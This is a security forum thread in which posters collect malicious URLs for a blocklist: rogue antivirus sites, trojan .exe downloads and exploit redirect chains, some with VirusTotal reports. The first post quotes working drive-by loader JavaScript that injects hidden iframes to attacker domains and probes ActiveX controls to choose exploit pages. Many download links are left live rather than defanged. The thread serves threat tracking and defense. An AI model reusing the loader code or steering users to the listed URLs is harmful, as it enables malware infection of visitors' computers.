daily something......

[SysAdMini]

Code: [Select]

hxxp://uin5.cn

Code: [Select]

function init(){window.status="";}window.onload = init;
if(document.cookie.indexOf("play=")==-1)
{
var expires=new Date();
expires.setTime(expires.getTime()+24*60*60*1000);
document.cookie="play=Yes;path=/;expires="+expires.toGMTString();
if(navigator.userAgent.toLowerCase().indexOf("msie")>0)
{
document.write("<Iframe src=http://sllwbd2.cn/a1/ilink.html width=100 height=0></Iframe>");
}
else{document.write("<Iframe src=http://sllwbd2.cn/a1/flink.html width=100 height=0></Iframe>");}
}
document.writeln("<Iframe src=http:\/\/www.zghncsq.cn\/b2.htm width=50 height=0><\/iframe>")

Code: [Select]

hxxp://sllwbd2.cn/a1/ilink.html
hxxp://sllwbd2.cn/a1/flink.html contain some flash exploits


http://www.virustotal.com/analisis/9bc0c8341d75029f720ae8bccb382691 14/36
http://www.virustotal.com/analisis/366887d40b9994e8652cbe7961fefcf6 14/36
http://www.virustotal.com/analisis/b4fe9309a779516d75886e3222f975b2 14/36
http://www.virustotal.com/analisis/b3618fd15fc152e18089c22a9c97fb65 14/36
http://www.virustotal.com/analisis/18634c476617d3855b49a3901437389d 14/36

Code: [Select]

hxxp://www.zghncsq.cn/b2.htmtakes you to

Code: [Select]

hxxp://sllwbd2.cn/a1/fxx.htmwith some more exploits

Code: [Select]

<script>
document.write("<iframe width=100 height=0 src=fx.htm></iframe>");
document.write("<iframe width=100 height=0 src=ss.html></iframe>");
window.status="Íê³É";
window.onerror=function(){return true;}
if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1)
document.write("<iframe width=50 height=0 src=MS06014.htm></iframe>");
try{var m;
var hw=new ActiveXObject("Downloader.DLoader.1");}
catch(m){};                     
finally{if(m!="[object Error]"){document.write("<iframe width=100 height=0 src=http://sllwbd2.cn/sina.htm></iframe>");}}
try{var n;var qxxxxx="dxaaaa";var povjudgqjx="fsdfvjjt";
var hl=new ActiveXObject("UUUPGRADE.UUUpgradeCtrl.1");}
catch(n){};                     
finally{if(n!="[object Error]"){document.write("");
document.write("<iFrame width=100 height=0 src=http://sllwbd2.cn/UU.htm></iframe>");}}var ddddddddd="dddddddddds";
try{var b;
var ml=new ActiveXObject("DPClient.Vod");}
catch(b){};                     
finally{if(b!="[object Error]"){document.write("<iframe width=100 height=0 src=Thunder.html></iframe>");}}
try{var f;
var gw=new ActiveXObject("GLIEDown.IEDown.1");}
catch(f){};                     
finally{if(f!="[object Error]"){document.write("<iframe width=100 height=0 src=GLWORLD.html></iframe>");}}
function test()
{
rrooxx = "IER" + "PCtl.I" + "ERP" + "Ctl.1";
try
{
Like = new ActiveXObject(rrooxx);
}catch(error){return;}
vvvvv = Like.PlayerProperty("PRODUCTVERSION");
if(vvvvv<="\x36\x2e\x30\x2e\x31\x34\x2e\x35\x35\x32")
document.write("<iframe width=100 height=0 src=real.htm></iframe>");
else
document.write("<iframe width=100 height=0 src=Real.html></iframe>");
}
test();
document.write("");document.write("");document.write("");document.write("");var fjd="fdsfsd";document.write("");
</script>
ends up in

Code: [Select]

hxxp://www.oiuytr.net/new/a11.csshttp://www.virustotal.com/analisis/8ae968467b62acf4b9196cd8f6c287f6

[sowhat-x]

hxxp://sutra2s.info/in.cgi?16
hxxp://www.qualityvidz.com/index.php?id=1133&style=black
hxxp://www.wmpinstrument.com/download.php?id=1133
hxxp://porntube08.com/?t_type=amateurs&id=1264
hxxp://cleanlive.net/download/FlashPlayer.v1.264.exe

hxxp://mycigarworld.info/in.cgi?16
hxxp://mymostprivatevideo.com/exclusive2/id/3913000/2/black/white/
hxxp://softwareformyvideo.com/exe2/3913000.exe

hxxp://ieskok.info/in.cgi?6
hxxp://video-4.lovimomentinaslazdaisia.com/
hxxp://scan.scannerantispyware.com/419/6/
hxxp://files.downloadproas2009.com/load/setup_419_6777_.exe

hxxp://fastfind.info/in.cgi?17
hxxp://my-tubemovies-collection.com/promo2/?wmid=328
hxxp://my-tubemovies-collection.com/promo2/get.php?wmid=328&softname=full_dvd_video

hxxp://seaarch.info/in.cgi?11&group=2
hxxp://antivirusdefense.com/2009/1/en/freescan.php?id=77053501
hxxp://antivirusdefense.com/2009/download/trial/A9installertest_77053501.exe

hxxp://skyyy.info/in.cgi
hxxp://www.movzline.com/m5/index.php?id=1387&n=teen&a=usagi&v=309466.88888889
hxxp://www.wmpinstrument.com/download.php?id=1387

[lanvin]

hxxp://upload.turkbaze.org/1337.exe
hxxp://www.searchcasino.net/everestpoker/download/EverestPoker.exe
hxxp://files.brothersoft.com/chat/miscellaneous/zango.im%20Installer79.exe
hxxp://files.brothersoft.com/games/action/Alien_Shooter_56025.exe
hxxp://files.brothersoft.com/dvd_video/misc_multimedia/regular_plugin.exe
hxxp://files.brothersoft.com/business/accounting_software/1_4_all_Account_lite-install-14218.exe
hxxp://jp.brothersoft.com/upload/13/6255.20071120051301.exe
hxxp://files7.brothersoft.com/utilities/optimize_utilities/mechanic.exe
hxxp://files4.brothersoft.com/chat_e-mail/misc_chat/MyEmoticons.exe
hxxp://files5.brothersoft.com/internet/p2p_file_sharing/KDM-Setup.exe
hxxp://www.indev.no/FlashMute_2.exe
hxxp://www.spytech-web.com/spytechonline/Files/spyagent6.zip
hxxp://files.brothersoft.com/RegNow/xpadvancedkeylogger.exe
hxxp://vip-files.brothersoft.com/ek_setup.exe
hxxp://www.widestep.com/files/ek_setup.exe
hxxp://vip-files.brothersoft.com/keysetup.exe
hxxp://msn-checker-sniffer.jp.brothersoft.com/upload/17/8125.20071115231113.exe
hxxp://files.brothersoft.com/RegNow/modemspy.exe
hxxp://www.brothersoft.com/soft/regnow/sasetup19793.exe
hxxp://files.brothersoft.com/security/keylogger/SoftForYou_Keylogger_33203.exe
hxxp://chariot.tucows.com/files7/Anti_Virus.exe
hxxp://files.brothersoft.com/wallpaper/miscellaneous/wallpaper.exe
hxxp://download.speedbit.com/dap86-bros.exe 
hxxp://files.brothersoft.com/dvd_video/misc_multimedia/regular_plugin.exe 
hxxp://www.pchell.com/downloads/uninstall2.exe
hxxp://www.pchell.com/downloads/lopuninstall.exe
hxxp://www.pchell.com/checkout.shtml16845/IncrediUninstaller.exe

[lanvin]

Code: [Select]

http://111.vvvbw.cn/new/new1.exe
http://111.vvvbw.cn/new/new2.exe
http://111.vvvbw.cn/new/new3.exe
http://111.vvvbw.cn/new/new4.exe
http://111.vvvbw.cn/new/new5.exe
http://111.vvvbw.cn/new/new6.exe
http://111.vvvbw.cn/new/new7.exe
http://111.vvvbw.cn/new/new8.exe
http://111.vvvbw.cn/new/new9.exe
http://222.vvvbw.cn/new/new11.exe
http://222.vvvbw.cn/new/new12.exe
http://222.vvvbw.cn/new/new13.exe
http://222.vvvbw.cn/new/new14.exe
http://222.vvvbw.cn/new/new15.exe
http://222.vvvbw.cn/new/new16.exe
http://222.vvvbw.cn/new/new17.exe
http://222.vvvbw.cn/new/new18.exe
http://222.vvvbw.cn/new/new19.exe

http://333.vvvbw.cn/new/new21.exe
http://333.vvvbw.cn/new/new22.exe
http://333.vvvbw.cn/new/new23.exe
http://333.vvvbw.cn/new/new24.exe
http://333.vvvbw.cn/new/new25.exe
http://333.vvvbw.cn/new/new26.exe

[bobby]

Code: [Select]

epeiy.com/wssl713fro.exe
http://www.virustotal.com/analisis/303be708a68899d8f1bad9591b9b4f89

[sparsha]

Sites related to Rogue Apps

Code: [Select]

hxxp://antivirusplus2009.com
hxxp://Antivirus-plus-2009.com
hxxp://Av-online-scan.org
hxxp://spyprotector-pro.com/install.exe
hxxp://sys-scanner.com
hxxp://traffchecking.com/warning/
hxxp://virusandspywarescaning.com
hxxp://watchnetprotection.com/scan/index.php?affid=00200
hxxp://whereismyclick.cn/soft.php?aid=0869&d=1&product=XPA
hxxp://pc-security-scanner.com/2009/1/en/_freescan.php?nu=77001101


[SysAdMini]

Sites related to Rogue Apps

Added to list.

[SysAdMini]

Code: [Select]

http://www.bm-740.cn/new/new1.exe
..
http://www.bm-740.cn/new/new24.exe
http://www.threatexpert.com/report.aspx?md5=16146737ffcd2c74d7dd9e7881056172

[sparsha]

more rogue apps related sites

Code: [Select]

http://files.proantispyware2009dl.com/load/setup_225_3777_.exe
http://int.proas2009report1.com/stat.php?func=installrun&id=241&landing=3777&lang=EN&sub=0&notstat=1
http://dl.storage-proas2009.com/get/?type=main&pin=241&lnd=3777

files.avnanodl.com/load/setup_243_3777_.exe
http://int.nanoantreport.com/stat.php?func=installrun&id=243&landing=3777&lang=EN&sub=0
http://dl.nanoantexe.com/get/?type=main&pin=243&lnd=3777

real-av.org
http://lsp-test-nax.ind.in/winlogon.htm
http://pmsoftware.biz/cgi-bin/lsp.pl?code=15
proantiviruspcscan.com


http://becomepoweruser.cn/soft.php?aid=0754&d=1&product=XPA
http://best-antivirus-scanner.com/2009/1/freescan.php?nu=77001101
http://clickoverridesystem.cn/soft.php?aid=0754&d=1&product=XPA
http://defendedsystemuser.cn/soft.php?aid=0754&d=1&product=XPA
bestantivirusproscanner.com/2009/1/freescan.php?nu=77001101
livepcantivirusscan.com
http://protectedonlinepayments.com
http://protectionauditview.cn/2008/update.php?ver=
http://securedclickuse.cn/soft.php?aid=0754&d=1&product=XPA
http://securedwwwclicks.com/soft.php?aid=0754&d=1&product=XPA
http://styleonlyclicks.cn/soft.php?aid=0754&d=1&product=XPA
http://trustourclicks.cn/soft.php?aid=0754&d=1&product=XPA
http://whereismyclick.cn/soft.php?aid=0754&d=1&product=XPA



[SysAdMini]

more rogue apps related sites

Thank you. Added to list.

[sparsha]

AV2009 rogue sites: This gang is changing fake/scare scanner sites very frequently 

Code: [Select]


http://bestantivirusdefense.com/2009/1/freescan.php?nu=77001101
http://privatewebsystemupdate.com/download/av_2009glof.exe



[sparsha]

Spyware Protect 2009 related sites:

Code: [Select]

av10antivir.com/free_scan.exe
sp-protect2009.com
spwprotect2009.com
spyprotect2009.com
spywprotect2009.com
Spywprotect.com
swp2009.com


[SysAdMini]

exploits/trojans

starting at

Code: [Select]

http://www.44aaaa.com/
redirects to urls where css files are trojans

Code: [Select]

http://www.44aaaa.com/aa.htm
http://daoye.nm.cn/a38_1104/new.html
http://daoye.nm.cn/real.html
http://user666.66-18.net/re11.css
http://daoye.nm.cn/real.htm
http://user666.66-18.net/re10.css
http://daoye.nm.cn/yy456.htm
http://user666.66-18.net/lz.css
http://daoye.nm.cn/yy123.htm
http://user666.66-18.net/bfyy.css
http://daoye.nm.cn/no.htm
http://user666.66-18.net/no.css
http://daoye.nm.cn/sms.htm
http://user666.66-18.net/sms.css
http://daoye.nm.cn/for.htm
http://user666.66-18.net/for.css
http://daoye.nm.cn/a38_1104/what.htm
http://user666.66-18.net/a38.css
http://daoye.nm.cn/a38_1104/who.htm


[SysAdMini]

Code: [Select]

www.wixks.com/new/new1.exe
www.wixks.com/new/new2.exe
www.wixks.com/new/new3.exe
www.wixks.com/new/new4.exe
www.wixks.com/new/new5.exe
www.wixks.com/new/new6.exe
www.wixks.com/new/new7.exe
www.wixks.com/new/new8.exe
www.wixks.com/new/new9.exe
www.wixks.com/new/new10.exe
www.wixks.com/new/new11.exe
www.wixks.com/new/new12.exe
www.wixks.com/new/new13.exe
www.wixks.com/new/new14.exe
www.wixks.com/new/new15.exe
www.wixks.com/new/new16.exe
www.wixks.com/new/new17.exe
www.wixks.com/new/new18.exe
www.wixks.com/new/new19.exe
www.wixks.com/new/new20.exe
www.wixks.com/new/new21.exe
www.wixks.com/new/new22.exe
www.wixks.com/new/new23.exe
www.wixks.com/new/new24.exe
www.wixks.com/new/new25.exe
www.wixks.com/new/new26.exe

[sparsha]

"XP Protection Center"

braviax/brastk advertised rogue

Code: [Select]

http://Xp-protcenter.com/install/Installer.exe
http://Xp-protectioncenter.com/install/Installer.exe
http://Xpprotection-center.com/install/Installer.exe
http://Xp-protection-center.com/install/Installer.exe
http://Xpp-center.com/install/Installer.exe
http://Xppcenter.com/install/Installer.exe
http://xpprot-center.com/install/Installer.exe
http://xpprotcenter.com/install/Installer.exe
http://Xp-p-center.com/install/Installer.exe
http://Xp-pcenter.com/install/Installer.exe
http://Xp-prot-center.com/install/Installer.exe